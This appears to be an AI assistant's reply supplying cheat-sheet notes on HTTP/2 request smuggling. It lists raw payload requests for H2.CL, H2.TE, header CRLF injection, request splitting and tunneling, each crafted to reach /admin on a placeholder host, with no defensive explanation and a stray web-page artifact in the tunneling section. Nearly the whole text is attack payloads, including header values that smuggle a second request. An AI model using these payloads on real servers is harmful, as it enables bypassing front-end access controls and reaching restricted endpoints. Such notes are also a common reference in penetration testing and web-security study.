Certainly! Here is the content for HTTP/2 request smuggling techniques in the same style as your existing notes:
Request Smuggling HTTP/2
H2.CL
POST /target HTTP/2
Host: example.com
content-length: 0
GET /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=1GET / H
H2.TE
POST /example HTTP/2
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
Foo: bar
CRLF Injection
POST /example HTTP/2
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Foo: bar\nTransfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
Foo: bar
HTTP/2 Request Splitting
POST /example HTTP/2
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Foo: bar\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: vulnerable-website.com
HTTP Request Tunneling
To Review (opens in a new tab)
:method: CONNECT
:scheme: https
:path: /target
:authority: example.com
content-length: 13
0
CONNECT /admin HTTP/2
:authority: example.com